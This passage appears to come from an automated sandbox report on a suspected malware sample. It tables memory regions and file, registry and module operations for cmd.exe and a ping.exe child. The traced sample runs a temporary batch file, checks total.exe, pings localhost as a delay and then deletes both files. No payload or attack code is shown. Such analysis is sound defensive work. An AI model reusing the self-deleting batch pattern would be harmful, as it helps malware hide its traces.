| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (184)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\1.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
5 | |
| Create | NUL | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\1.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp | type = file_attributes |
|
2 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
25 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp\1.bat | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
89 | |
| Open | STD_INPUT_HANDLE | - |
|
7 | |
| Open | STD_INPUT_HANDLE | - |
|
14 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 198 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 192 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 166 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 114 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 4 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 53 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 33 |
|
1 | |
| Delete | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | - |
|
1 | |
| Delete | C:\Users\ADU0VK~1\AppData\Local\Temp\1.bat | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (12)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ADVAPI32.dll | base_address = 0x76650000 |
|
1 | |
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4ac10000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75c90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75cba84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75cc3b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ca4a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x75cba79d |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x76672102 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x76673352 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferCloseLevel, address_out = 0x76673825 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-08-30 14:40:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 198542 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
3 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\ADU0VK~1\AppData\Local\Temp |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #9: ping.exe
17
4
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\syswow64\ping.exe |
| Command Line | ping localhost -n 2 |
| Initial Working Directory | C:\Users\ADU0VK~1\AppData\Local\Temp\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x72c |
| Parent PID | 0xcc (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
3AC
0x
418
0x
804
0x
814
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| ping.exe.mui | 0x00080000 | 0x00082fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00120000 | 0x00186fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x00557fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x006e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x006f0000 | 0x009befff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x00a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a60000 | 0x00a60000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b80000 | 0x00b80000 | 0x00bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00caffff | Private Memory | rw |
|
|
|
- |
| ping.exe | 0x00cf0000 | 0x00cf7fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x020fffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0219ffff | Private Memory | rw |
|
|
|
- |
| fwpuclnt.dll | 0x75060000 | 0x75097fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x750b0000 | 0x750b5fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x751f0000 | 0x75233fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x755d0000 | 0x755d7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x755e0000 | 0x7563bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75640000 | 0x7567efff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x75680000 | 0x75685fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x75690000 | 0x756cbfff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x756f0000 | 0x756f4fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x75730000 | 0x75736fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x75740000 | 0x7575bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75880000 | 0x7588bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75890000 | 0x758effff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x75a00000 | 0x75a05fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a55fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75bc0000 | 0x75c6bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75c90000 | 0x75d9ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75f20000 | 0x7600ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76050000 | 0x7611bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76650000 | 0x766effff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76780000 | 0x7687ffff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x774d0000 | 0x7756cfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77600000 | 0x7768ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77790000 | 0x777effff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x777f0000 | 0x77808fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x778f0000 | 0x77924fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077930000 | 0x77930000 | 0x77a4efff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077a50000 | 0x77a50000 | 0x77b49fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77b50000 | 0x77cf8fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77d00000 | 0x77d09fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77d30000 | 0x77eaffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Write | STD_OUTPUT_HANDLE | size = 28 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 9 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 86 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 97 |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | value_name = DefaultTTL, data = 0, type = REG_NONE |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\ping.exe | base_address = 0xcf0000 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-08-30 14:40:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 198885 |
|
1 |
Network Behavior
ICMP (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Send ICMP Echo | source_address = 24.246.30.0, destination_address = 224.85.207.0, timeout = 4000 |
|
2 |
DNS (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = localhost |
|
1 | |
| Resolve Name | host = localhost, address_out = 0000:0000:0000:0000:0000:0000:0000:0001, 127.0.0.1 |
|
1 |
